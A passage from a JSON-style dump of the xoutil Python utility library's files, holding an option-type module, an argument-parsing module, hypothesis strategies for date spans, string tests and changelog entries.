None\n\n def __new__(cls, *args):\n default = cls is Just\n if len(args) == 0:\n arg = default\n elif len(args) == 1:\n arg = args[0]\n else:\n msg = '{}: receive too many arguments \"{}\"'\n raise TypeError(msg.format(cls.__name__, len(args)))\n if arg is default or arg is None and cls is Wrong:\n idx = 2 if arg is None else arg\n if cls._singletons[idx] is None:\n self = super().__new__(cls)\n self.inner = arg\n cls._singletons[idx] = self\n return cls._singletons[idx]\n elif cls is Maybe:\n return (Just if arg else Wrong)(arg)\n elif isinstance(arg, cls):\n return arg\n elif not isinstance(arg, Maybe):\n self = super().__new__(cls)\n self.inner = arg\n return self\n else:\n msg = \"re-wrapping inverted value: {}({})\"\n raise ValueError(msg.format(cls.__name__, arg))\n\n def __init__(self, *args):\n pass\n\n def 
__nonzero__(self):\n return isinstance(self, Just)\n\n __bool__ = __nonzero__\n\n def __str__(self):\n return \"{}({!r})\".format(type(self).__name__, self.inner)\n\n __repr__ = __str__\n\n def __eq__(self, other):\n return (\n isinstance(other, type(self))\n and self.inner == other.inner\n or self.inner is other\n ) # TODO: check if `==` instead `is`\n\n def __ne__(self, other):\n return not (self == other)\n\n @classmethod\n def compel(cls, value):\n \"\"\"Coerce to the correspondent logical Boolean value.\n\n `Just`:class: is logically true, and `Wrong` is false.\n\n For example::\n\n >>> Just.compel([1])\n [1]\n\n >>> Just.compel([])\n Just([])\n\n >>> Wrong.compel([1])\n Wrong([1])\n\n >>> Wrong.compel([])\n []\n\n \"\"\"\n if cls is not Maybe:\n test = cls is Just\n dual = Wrong if test else Just\n if bool(value) is test:\n return value\n elif not isinstance(value, dual):\n return cls(value)\n else:\n msg = '''a \"{}\" value can't be coerced to \"{}\"'''\n vname = type(value).__name__\n raise TypeError(msg.format(vname, cls.__name__))\n else:\n raise TypeError(\"\"\"don't call at Maybe base level\"\"\")\n\n @classmethod\n def choose(cls, *types):\n \"\"\"Decorator to force `Maybe` values constraining to expecting types.\n\n For example, a function that return a collection (tuple or list) if\n valid or False if not, if not decorated could be ambiguous for an\n empty collection::\n\n >>> @Just.choose(tuple, list)\n ... def check_range(values, min, max):\n ... if isinstance(values, (tuple, list)):\n ... return [v for v in values if min <= v <= max]\n ... else:\n ... 
return False\n\n >>> check_range(range(10), 7, 17)\n [7, 8, 9]\n\n >>> check_range(range(10), 17, 27)\n Just([])\n\n >>> check_range(set(range(10)), 7, 17)\n False\n\n \"\"\"\n pass\n\n\nclass Just(Maybe):\n \"\"\"A wrapper for valid results.\"\"\"\n\n __slots__ = ()\n\n\nclass Wrong(Maybe):\n \"\"\"A wrapper for invalid results.\"\"\"\n\n __slots__ = ()\n\n\ndef take(value):\n \"\"\"Extract a value.\"\"\"\n return value.inner if isinstance(value, Maybe) else value\n\n\n# ---- special singletons ----\n\n#: A `Wrong`:class: special singleton encapsulating the `False` value.\nfalse = Wrong()\n\n#: A `Just`:class: special singleton encapsulating the `True` value.\ntrue = Just()\n\n#: A `Wrong`:class: special singleton encapsulating the `None` value.\nnone = Wrong(None)\n" }, { "alpha_fraction": 0.7016128897666931, "alphanum_fraction": 0.7177419066429138, "avg_line_length": 48.599998474121094, "blob_id": "606ae2b08df108eebfc77c8b0d3039794afbd27b", "content_id": "33241627cc573dc906d151b1684c09ae7132c317", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 248, "license_type": "permissive", "max_line_length": 73, "num_lines": 5, "path": "/docs/source/history/_changes-1.8.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add parameter 'encoding' to `~xoutil.string.slugify`:func: and\n `~xoutil.eight.string.force_ascii`:func:. (bug #25).\n\n- Stop using `locale.getpreferredencoding`:func: in\n `~xoutil.future.codecs.force_encoding`:func:. 
Also related to bug #25.\n" }, { "alpha_fraction": 0.7574712634086609, "alphanum_fraction": 0.7574712634086609, "avg_line_length": 44.78947448730469, "blob_id": "e1dbff2c8ffb0c429d9dd918e4af02d0ed32345f", "content_id": "231fa1a2158cb791007fa44b5f1f8b05f5facca5", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 870, "license_type": "permissive", "max_line_length": 79, "num_lines": 19, "path": "/docs/source/history/changes-1.3.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Removes deprecated module `!xoutil.mdeco`:mod:.\n\n- `xoutil.context.Context`:class: now inherit from the newly created stacked\n dict class `xoutil.collections.StackedDict`:class:. Whenever you enter a\n context a new level of the stacked dict is `pushed\n <xoutil.collections.StackedDict.push>`:meth:, when you leave the context a\n level is <xoutil.collections.StackedDict.pop>`:meth:.\n\n This also **removes** the `data` attribute execution context used to have,\n and, therefore, this is an incompatible change.\n\n- Introduces `xoutil.collections.OpenDictMixin`:class: and\n `xoutil.collections.StackedDict`:class:.\n\n- Fixes a bug in `xoutil.decorator.compat.metaclass`:func:\\ : Slots were not\n properly handed.\n\n- Fixes a bug with the simple `xoutil.collections.opendict`:class: that allowed\n to shadow methods (even `__getitem__`) thus making the dict unusable.\n" }, { "alpha_fraction": 0.5705721974372864, "alphanum_fraction": 0.5757105350494385, "avg_line_length": 31.719789505004883, "blob_id": "14913897cb961a1821a8342976da58aa5d8fa864", "content_id": "e6d946cf7088af6afe9c6d3ab4dddfdb1e3a8441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18684, "license_type": "no_license", "max_line_length": 88, "num_lines": 571, "path": "/xotl/tools/params.py", "repo_name": 
"merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for managing function arguments.\n\nProcess function arguments could be messy when a flexible schema is needed.\nWith this module you can outline parameters schema using a smart way of\nprocessing actual arguments:\n\nA parameter row (see `ParamSchemeRow`:class:), allow several keywords IDs (one\nis required used as the final identifier for the actual argument). Also\ninteger IDs expressing logical order for positional argument passing (negative\nvalues are for right-to-left indexing, like in sequences). Several values\nmeans several possibilities.\n\n.. versionadded:: 1.8.0\n\n\"\"\"\n\n\n#: The maximum number of positional arguments allowed when calling a function.\nMAX_ARG_COUNT = 1024 * 1024 # just any large number\n\nfrom xotl.tools.symbols import Undefined # used implicitly for absent default\n\n\ndef issue_9137(args):\n \"\"\"Parse arguments for methods, fixing `issue 9137`__ (self ambiguity).\n\n There are methods that expect 'self' as valid keyword argument, this is\n not possible if this name is used explicitly::\n\n def update(self, *args, **kwds):\n ...\n\n To solve this, declare the arguments as ``method_name(*args, **kwds)``,\n and in the function code::\n\n self, args = issue_9137(args)\n\n :returns: (self, remainder positional arguments in a tuple)\n\n .. 
versionadded:: 1.8.0\n\n __ https://bugs.python.org/issue9137\n\n \"\"\"\n self = args[0] # Issue 9137\n args = args[1:]\n return self, args\n\n\ndef check_count(args, low, high=MAX_ARG_COUNT, caller=None):\n \"\"\"Check the positional arguments actual count against constrains.\n\n :param args: The args to check count, normally is a tuple, but an integer\n is directly accepted.\n\n :param low: Integer expressing the minimum count allowed.\n\n :param high: Integer expressing the maximum count allowed.\n\n :param caller: Name of the function issuing the check, its value is used\n only for error reporting.\n\n .. versionadded:: 1.8.0\n\n\n \"\"\"\n # TODO: Shouldn't we use the TypeError and ValueError?\n assert isinstance(low, int) and low >= 0\n assert isinstance(high, int) and high >= low\n if isinstance(args, int):\n count = args\n if count < 0:\n msg = \"check_count() don't accept a negative argument count: {}\"\n raise ValueError(msg.format(count))\n else:\n count = len(args)\n if count < low:\n error = True\n adv = \"exactly\" if low == high else \"at least\"\n if low == 1:\n aux = \"{} one argument\".format(adv)\n else:\n aux = \"{} {} arguments\".format(adv, low)\n elif count > high:\n error = True\n if low == high:\n if low == 0:\n aux = \"no arguments\"\n elif low == 1:\n aux = \"exactly one argument\"\n else:\n aux = \"exactly {} arguments\".format(low)\n elif high == 1:\n aux = \"at most one argument\"\n else:\n aux = \"at most {} arguments\".format(high)\n else:\n error = False\n if error:\n if caller:\n name = \"{}()\".format(caller)\n else:\n name = \"called function or method\"\n raise TypeError(\"{} takes {} ({} given)\".format(name, aux, count))\n\n\ndef check_default(absent=Undefined):\n \"\"\"Get a default value passed as a last excess positional argument.\n\n :param absent: The value to be used by default if no one is given.\n Defaults to `~xotl.tools.symbols.Undefined`:obj:.\n\n For example::\n\n def get(self, name, *default):\n from 
xotl.tools.params import check_default, Undefined\n if name in self.inner_data:\n return self.inner_data[name]\n elif check_default()(*default) is not Undefined:\n return default[0]\n else:\n raise KeyError(name)\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n def default(res=absent):\n return res\n\n return default\n\n\ndef single(args, kwds):\n \"\"\"Return a true value only when a unique argument is given.\n\n When needed, the most suitable result will be wrapped using the\n `~xotl.tools.fp.option.Maybe`:class:.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n from xotl.tools.fp.option import Just, Wrong, take\n\n if len(args) == 1 and not kwds:\n res = take(args[0])\n if not res:\n res = Just(res)\n res = Just(res)\n elif not args and len(kwds) == 1:\n res = kwds\n else:\n res = Wrong((args, kwds))\n return res\n\n\ndef pop_keyword_arg(kwargs, names, default=Undefined):\n \"\"\"Return the value of a keyword argument.\n\n :param kwargs: The mapping with passed keyword arguments.\n\n :param names: Could be a single name, or a collection of names.\n\n :param default: The default value to return if no value is found.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n from xotl.tools.objects import pop_first_of\n\n if isinstance(names, str):\n names = (names,)\n return pop_first_of(kwargs, *names, default=default)\n\n\ndef pop_keyword_values(kwargs, *names, **options):\n \"\"\"Return a list with all keyword argument values.\n\n :param kwargs: The mapping with passed keyword arguments.\n\n :param names: Each item will be a definition of keyword argument name to\n retrieve. Could be a string with a name, or a list of alternatives\n (aliases).\n\n :keyword default: Keyword only option to define a default value to be used\n in place of not given arguments. If not given, it is used\n special value `~xotl.tools.symbols.Undefined`:obj:.\n\n :keyword defaults: A dictionary with default values per argument name. If\n none is given, use `default`.\n\n .. note:: `defaults` trumps `default`.\n\n .. 
warning:: For the case where a single name has several\n alternatives, you may choose any of the alternatives. If you\n pass several diverging defaults for different alternatives, the\n result is undefined.\n\n :keyword ignore_error: By default, when there are remaining values in\n `kwargs`, after all names are processed, a `TypeError`:class: is\n raised. If this keyword only option is True, this function returns\n normally.\n\n Examples::\n\n >>> pop_keyword_values({'b': 1}, 'a', 'b')\n [Undefined, 1]\n\n >>> kwargs = {'a': 1, 'b': 2, 'c': 3}\n >>> try:\n ... res = pop_keyword_values(kwargs, 'a', 'b')\n ... except TypeError as error:\n ... res = error\n >>> type(res)\n TypeError\n\n >>> kwargs = {'a': 1, 'b': 2, 'c': 3}\n >>> options = dict(ignore_error=True, default=None)\n >>> pop_keyword_values(kwargs, 'a', ('B', 'b'), **options)\n [1, 2]\n\n .. versionadded:: 1.8.3\n\n \"\"\"\n default = options.get(\"default\", Undefined)\n defaults = options.get(\"defaults\", {})\n res = []\n for item in names:\n val = pop_keyword_arg(kwargs, item, default=Undefined)\n if val is Undefined:\n val = pop_keyword_arg(defaults, item, default=default)\n res.append(val)\n if kwargs and not options.get(\"ignore_error\", False):\n msg = 'calling function got unexpected keyword arguments \"{}\"'\n raise TypeError(msg.format(tuple(kwargs)))\n return res\n\n\nclass ParamManager:\n \"\"\"Function parameters parser.\n\n For example::\n\n def wraps(*args, **kwargs):\n pm = ParamManager(args, kwargs)\n name = pm(0, 1, 'name', coerce=str)\n wrapped = pm(0, 1, 'wrapped', coerce=valid(callable))\n ...\n\n When an instance of this class is called (``__call__`` operator), it is\n used the same protocol as when creating an instance of a parameter\n definition row (`ParamSchemeRow`:class:).\n\n See `ParamScheme`:class: class as another way to define and validate\n schemes for extracting parameter values in a consistent way.\n\n\n .. 
versionadded:: 1.8.0\n\n \"\"\"\n\n def __init__(self, args, kwds):\n \"\"\"Created with actual parameters of a client function.\"\"\"\n self.args = args\n self.kwds = kwds\n self.consumed = set() # consumed identifiers\n\n def __call__(self, *ids, **options):\n \"\"\"Get a parameter value.\"\"\"\n from xotl.tools.fp.option import Just, Wrong, none\n\n # TODO: Change this ``from xotl.tools.values import coercer``\n from xotl.tools.fp.prove.semantic import predicate as coercer\n\n args, kwds = self.args, self.kwds\n i, res = 0, none\n while isinstance(res, Wrong) and i < len(ids):\n key = ids[i]\n if key in self.consumed:\n pass\n elif isinstance(key, int):\n try:\n res = args[key]\n except IndexError:\n pass\n elif key in kwds:\n res = kwds[key]\n if not isinstance(res, Wrong) and \"coerce\" in options:\n aux = coercer(options[\"coerce\"])(res)\n res = aux.inner if isinstance(aux, Just) else aux\n if not isinstance(res, Wrong):\n self.consumed.add(key)\n if isinstance(key, int) and key < 0:\n # consume both, negative and adjusted value\n key = len(args) + key\n self.consumed.add(key)\n else:\n i += 1\n if isinstance(res, Wrong):\n if \"default\" in options:\n return options[\"default\"]\n elif isinstance(res.inner, BaseException):\n raise res.inner\n else:\n raise TypeError('value for \"{}\" is not found'.format(ids))\n else:\n return res.inner if isinstance(res, Just) else res\n\n def remainder(self):\n \"\"\"Return not consumed values in a mapping.\"\"\"\n passed = set(range(len(self.args))) | set(self.kwds)\n ids = passed - self.consumed\n args, kwds = self.args, self.kwds\n return {k: args[k] if isinstance(k, int) else kwds[k] for k in ids}\n\n\nclass ParamSchemeRow:\n \"\"\"Scheme row for a `ParamManager`:class: instance call.\n\n This class validates identifiers and options at this level; these\n checks are not done in a call to get a parameter value.\n\n Normally this class is used as part of a full `ParamScheme`:class:\n composition.\n\n Additionally to the 
options can be passed to\n `ParamManager.__call__`:meth:', this class can be instanced with:\n\n :param ids: positional variable number arguments, could be aliases for\n keyword parameter passing, or integers for order (negative values\n are means right-to-left indexing, like in sequences);\n\n :param key: an identifier to be used when the parameter is only positional\n or when none of the possible keyword aliases must be used as the\n primary-key;\n\n :param default: keyword argument, value used if the parameter is absent;\n\n :param coerce: check if a value is valid or not and convert to its\n definitive value; see `xotl.tools.values`:mod: module for more\n information.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n __slots__ = (\"ids\", \"options\", \"_key\")\n\n def __init__(self, *ids, **options):\n from collections import Counter\n from xotl.tools.fp.option import none\n\n iskey = lambda s: isinstance(s, str) and s.isidentifier()\n # TODO: Change this ``from xotl.tools.values import coercer``\n from xotl.tools.fp.prove.semantic import predicate as coercer\n\n aux = {k: c for k, c in Counter(ids).items() if c > 1}\n if aux:\n parts = [\"{!r} ({})\".format(k, aux[k]) for k in aux]\n msg = \"{}() repeated identifiers: {}\"\n raise TypeError(msg.format(type(self).__name__, \", \".join(parts)))\n else:\n\n def ok(k):\n return iskey(k) or isinstance(k, int)\n\n bad = [k for k in ids if not ok(k)]\n if bad:\n msg = (\n \"{}() identifiers with wrong type (only int and str \" \"allowed): {}\"\n )\n raise TypeError(msg.format(type(self).__name__, bad))\n key = options.pop(\"key\", none)\n if not (key is none or iskey(key)):\n msg = '\"key\" option must be an identifier, \"{}\" of type \"{}\" ' \"given\"\n raise TypeError(msg.format(key, type(key).__name__))\n if \"default\" in options:\n aux = {\"default\": options.pop(\"default\")}\n else:\n aux = {}\n if \"coerce\" in options:\n aux[\"coerce\"] = coercer(options.pop(\"coerce\"))\n if options:\n msg = \"{}(): received 
invalid keyword parameters: {}\"\n raise TypeError(msg.format(type(self).__name__, set(options)))\n self.ids = ids\n self.options = aux\n self._key = key\n\n def __str__(self):\n parts = [repr(k) for k in self.ids]\n for key, value in self.options.items():\n parts.append(\"{}={!r}\".format(key, value))\n aux = \", \".join(parts)\n return \"ParamSchemeRow({})\".format(aux)\n\n __repr__ = __str__\n\n def __call__(self, *args, **kwds):\n \"\"\"Execute a scheme-row using as argument a `ParamManager` instance.\n\n The concept of `ParamManager`:class: instance argument is a little\n tricky: when a variable number of arguments is used, if only one\n positional and is already an instance of `ParamManager`:class:, it is\n directly used; if two, the first is a `tuple` and the second is a\n `dict`, these are considered the constructor arguments of the new\n instance; otherwise all arguments are used to build the new instance.\n\n \"\"\"\n count = len(args)\n if count == 1 and not kwds and isinstance(args[0], ParamManager):\n manager = args[0]\n else:\n if count == 2 and not kwds:\n a, k = args\n if isinstance(a, tuple) and isinstance(k, dict):\n args, kwds = a, k\n manager = ParamManager(args, kwds)\n return manager(*self.ids, **self.options)\n\n @property\n def default(self):\n \"\"\"Returned value if parameter value is absent.\n\n If not defined, special value ``none`` is returned.\n\n \"\"\"\n from xotl.tools.fp.option import none\n\n return self.options.get(\"default\", none)\n\n @property\n def key(self):\n \"\"\"The primary key for this scheme-row definition.\n\n This concept is a little tricky (the first string identifier if some\n is given, if not then the first integer). 
This definition is useful,\n for example, to return remainder not consumed values after a scheme\n process is completed (see `ParamManager.remainder`:meth: for more\n information).\n\n \"\"\"\n # TODO: calculate the key value in the constructor\n from xotl.tools.fp.option import none\n\n res = self._key\n if res is none:\n res = next((k for k in self.ids if isinstance(k, str)), None)\n if res is None:\n res = self.ids[0]\n self._key = res\n return res\n\n\nclass ParamScheme:\n \"\"\"Full scheme for a `ParamManager`:class: instance call.\n\n This class receives a set of `ParamSchemeRow`:class: instances and\n validate them as a whole.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n __slots__ = (\"rows\", \"cache\")\n\n def __init__(self, *rows):\n from xotl.tools.params import check_count\n\n check_count(len(rows) + 1, 2, caller=type(self).__name__)\n used = set()\n for idx, row in enumerate(rows):\n if isinstance(row, ParamSchemeRow):\n this = {k for k in row.ids if isinstance(k, str)}\n aux = used & this\n if not aux:\n used |= this\n else:\n msg = (\n '{}() repeated keyword identifiers \"{}\" in ' \"row {}\"\n ).format(type(self).__name__, aux, idx)\n raise ValueError(msg)\n self.rows = rows\n self.cache = None\n\n def __str__(self):\n # XXX: Use:: ',\\n\\i'.join(map(str, self))\n aux = \",\\n\\t\".join(str(row) for row in self)\n return \"{}({})\".format(type(self).__name__, aux)\n\n def __repr__(self):\n return \"{}({} rows)\".format(type(self).__name__, len(self))\n\n def __len__(self):\n \"\"\"The defined scheme-rows number.\"\"\"\n return len(self.rows)\n\n def __getitem__(self, idx):\n \"\"\"Obtain the scheme-row by a given index.\"\"\"\n if isinstance(idx, str):\n cache = self._getcache()\n return cache[idx]\n else:\n return self.rows[idx]\n\n def __iter__(self):\n \"\"\"Iterate over all defined scheme-rows.\"\"\"\n return iter(self.rows)\n\n def __call__(self, args, kwds, strict=True):\n \"\"\"Get a mapping with all resulting values.\n\n If special value 
'none' is used as 'default' option in a scheme-row,\n corresponding value isn't returned in the mapping if the parameter\n value is missing.\n\n \"\"\"\n\n def ok(v):\n from xotl.tools.fp.option import Wrong\n\n return not isinstance(v, Wrong)\n\n pm = ParamManager(args, kwds)\n aux = ((row.key, row(pm)) for row in self)\n res = {key: value for key, value in aux if ok(value)}\n rem = pm.remainder()\n if strict:\n if rem:\n msg = (\n \"after a full `{}` process, there are still remainder \"\n \"parameters: {}\"\n )\n raise TypeError(msg.format(type(self).__name__, set(rem)))\n else:\n res.update(rem)\n return res\n\n def keys(self):\n \"\"\"Partial compatibility with mappings.\"\"\"\n return self._getcache().keys()\n\n def items(self):\n \"\"\"Partial compatibility with mappings.\"\"\"\n return self._getcache().items()\n\n @property\n def defaults(self):\n \"\"\"Return a mapping with all valid default values.\"\"\"\n\n def ok(v):\n from xotl.tools.fp.option import Wrong\n\n return not isinstance(v, Wrong)\n\n aux = ((row.key, row.default) for row in self)\n return {k: d for k, d in aux if ok(d)}\n\n def _getcache(self):\n if not self.cache:\n self.cache = {row.key: row for row in self}\n return self.cache\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 76, "blob_id": "f77c0dee0e9142ba8a38b99f2c0b5d72e645f201", "content_id": "e3f29eed6973be4e6ef94244721f169597074c3d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 77, "license_type": "permissive", "max_line_length": 76, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.7 <rel-1.9.7>`:ref:\\\n" }, { "alpha_fraction": 0.7536231875419617, "alphanum_fraction": 0.7536231875419617, 
"avg_line_length": 68, "blob_id": "ee86d95ce2ea38852772a243187fa3977d9fcb19", "content_id": "b93dc0a0b9dbb06137c1c425e2ea36b6338e15f3", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 69, "license_type": "permissive", "max_line_length": 68, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Correct `xotl.tools.infinity.Infinity`:obj: so that it's hashable.\n" }, { "alpha_fraction": 0.614835262298584, "alphanum_fraction": 0.6247408390045166, "avg_line_length": 32.9140625, "blob_id": "7b5eab35195d47c25809cb92f362a8dc19ac461c", "content_id": "ac5be491749736145d154983635043a1b16cf1d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4342, "license_type": "no_license", "max_line_length": 82, "num_lines": 128, "path": "/xotl/tools/testing/datetime.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom hypothesis import strategies\n\n\[email protected]\ndef timespans(draw, dates=None, unbounds=\"any\", always_valid=True):\n \"\"\"A strategy that generates `xotl.tools.future.datetime.TimeSpan`:class:.\n\n This is a `hypothesis`_ strategy.\n\n `dates` should be None or generator of `datetime.date`:class: objects.\n It defaults to `hypothesis.strategies.dates`:func:\n\n `unbounds` should be one of the strings 'none', 'any', 'past', 'future'.\n If 'any' then the generated time span can be `unbound\n <xotl.tools.future.datetime.TimeSpan.unbound>`:attr:. 
If 'past' it can be\n unbound to the past. If 'future', it can be unbound to the future. If\n 'none', the generated time span will always be bound. In all cases that\n generate unbound time spans, we can also generate bound time spans.\n\n If `always_valid` is True all generated time spans will be `valid\n <xotl.tools.future.datetime.TimeSpan.valid>`:attr:. Otherwise we may\n generate invalid ones.\n\n Usage::\n\n >>> from hypothesis import given\n >>> from xotl.tools.testing.datetime import timespans\n\n >>> @given(timespans())\n ... def test_timespan(ts):\n ... pass\n\n .. _hypothesis: https://hypothesis.readthedocs.io/\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n from xotl.tools.future.datetime import TimeSpan\n\n if dates is None:\n dates = strategies.dates()\n maybe = strategies.none() | dates\n if unbounds in (\"any\", \"past\", \"future\", \"none\"):\n if unbounds in (\"any\", \"past\"):\n date1 = draw(maybe)\n else:\n date1 = draw(dates)\n if unbounds in (\"any\", \"future\"):\n date2 = draw(maybe)\n else:\n date2 = draw(dates)\n else:\n raise ValueError(\"unbounds should be one of 'any', 'past', or 'future'.\")\n if date1 and date2 and always_valid:\n start1 = min(date1, date2)\n end1 = max(date1, date2)\n else:\n start1 = date1\n end1 = date2\n return TimeSpan(start_date=start1, end_date=end1)\n\n\[email protected]\ndef datetimespans(draw, dates=None, unbounds=\"any\", always_valid=True):\n \"\"\"A strategy that generates `xotl.tools.future.datetime.DateTimeSpan`:class:.\n\n This is a `hypothesis`_ strategy.\n\n `dates` should be None or generator of `datetime.datetime`:class: objects.\n It defaults to `hypothesis.strategies.datetimes`:func:\n\n `unbounds` should be one of the strings 'none', 'any', 'past', 'future'.\n If 'any' then the generated time span can be `unbound\n <xotl.tools.future.datetime.TimeSpan.unbound>`:attr:. If 'past' it can be\n unbound to the past. If 'future', it can be unbound to the future. 
If\n 'none', the generated time span will always be bound. In all cases that\n generate unbound time spans, we can also generate bound time spans.\n\n If `always_valid` is True all generated time spans will be `valid\n <xotl.tools.future.datetime.TimeSpan.valid>`:attr:. Otherwise we may\n generate invalid ones.\n\n Usage::\n\n >>> from hypothesis import given\n >>> from xotl.tools.testing.datetime import datetimespans\n\n >>> @given(datetimespans())\n ... def test_datetimespan(dts):\n ... pass\n\n .. _hypothesis: https://hypothesis.readthedocs.io/\n\n .. versionadded:: 1.9.7\n\n \"\"\"\n from xotl.tools.future.datetime import DateTimeSpan\n\n if dates is None:\n dates = strategies.datetimes()\n maybe = strategies.none() | dates\n if unbounds in (\"any\", \"past\", \"future\", \"none\"):\n if unbounds in (\"any\", \"past\"):\n date1 = draw(maybe)\n else:\n date1 = draw(dates)\n if unbounds in (\"any\", \"future\"):\n date2 = draw(maybe)\n else:\n date2 = draw(dates)\n else:\n raise ValueError(\"unbounds should be one of 'any', 'past', or 'future'.\")\n if date1 and date2 and always_valid:\n start1 = min(date1, date2)\n end1 = max(date1, date2)\n else:\n start1 = date1\n end1 = date2\n return DateTimeSpan(start_datetime=start1, end_datetime=end1)\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "03f3373e5a03d6fa33b0097e37a26b3c8965fa13", "content_id": "4dba8fc46b9576155682e88d0274f2cd8f0f93d9", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.5 <rel-1.9.5>`:ref:\\ :\n" }, { "alpha_fraction": 0.5883758068084717, 
"alphanum_fraction": 0.6003184914588928, "avg_line_length": 32.05263137817383, "blob_id": "7038730d37353d628b2e381407186f00d136bcf7", "content_id": "65bf04218b83f4c5701107479103eb23cf8039e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2516, "license_type": "no_license", "max_line_length": 72, "num_lines": 76, "path": "/tests/test_string.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom hypothesis import given, example\nfrom hypothesis.strategies import text\n\n\ndef test_slugify():\n from xoutil.string import slugify\n\n value = \" Á.e i Ó u \"\n options = dict(encoding=\"utf-8\")\n assert slugify(value, **options) == \"a-e-i-o-u\"\n assert slugify(value, \".\", invalid_chars=\"AU\", **options) == \"e.i.o\"\n assert slugify(value, valid_chars=\".\", **options) == \"a.e-i-o-u\"\n assert slugify(\"_x\", \"_\") == \"_x\"\n assert slugify(\"-x\", \"_\") == \"x\"\n assert slugify(\"-x-y-\", \"_\") == \"x_y\"\n assert slugify(None) == \"none\"\n assert slugify(1 == 1) == \"true\"\n assert slugify(1.0) == \"1-0\"\n assert slugify(135) == \"135\"\n assert slugify(123456, \"\", invalid_chars=\"52\") == \"1346\"\n assert slugify(\"_x\", \"_\") == \"_x\"\n\n\n# FIXME: Dont filter; `slugify` should consider this.\nvalid_replacements = text().filter(lambda x: \"\\\\\" not in x)\n\n\n@given(s=text(), invalid_chars=text(), replacement=valid_replacements)\n@example(s=\"0/0\", invalid_chars=\"-\", replacement=\"-\")\ndef test_slugify_hypothesis(s, invalid_chars, replacement):\n # TODO: (s='0:0', invalid_chars='z', replacement='ź')\n from xoutil.string import slugify\n from xoutil.string import 
force_ascii\n\n assert \" \" not in slugify(s), \"Slugs do not contain spaces\"\n\n assert \" \" in slugify(\n s + \" \", valid_chars=\" \"\n ), \"Slugs do contain spaces if explicitly allowed\"\n\n replacement = force_ascii(replacement).lower()\n invalid_chars = force_ascii(invalid_chars).lower()\n assert all(\n c not in slugify(s, replacement, invalid_chars=c)\n for c in invalid_chars\n if c not in replacement\n ), \"Slugs dont contain invalid chars\"\n\n\n@given(s=text(), p=text())\ndef test_cutting_is_inverse_to_adding(s, p):\n from xoutil.string import cut_prefix, cut_suffix\n\n assert cut_prefix(p + s, p) == s\n assert cut_suffix(s + p, p) == s\n assert cut_suffix(s, \"\") == s\n assert cut_prefix(s, \"\") == s\n\n\n@given(s=text(), p=text())\ndef test_cutting_is_stable(s, p):\n from xoutil.string import cut_prefix, cut_suffix\n\n if not s.startswith(p):\n assert cut_prefix(s, p) == s == cut_prefix(cut_prefix(s, p), p)\n if not s.endswith(p):\n assert cut_suffix(s, p) == s == cut_suffix(cut_suffix(s, p), p)\n" }, { "alpha_fraction": 0.6698113083839417, "alphanum_fraction": 0.698113203048706, "avg_line_length": 34.33333206176758, "blob_id": "c505cad5af86d55307ab173938e6c266386cb9c6", "content_id": "0068762f10e5384142a3ab5efcb46da973ed5c37", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 106, "license_type": "permissive", "max_line_length": 55, "num_lines": 3, "path": "/docs/source/history/_changes-1.9.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug__ in `xoutil.cli`:mod: for Python 3.7.\n\n__ https://gitlab.merchise.org/merchise/xoutil/issues/3\n" }, { "alpha_fraction": 0.7165898680686951, "alphanum_fraction": 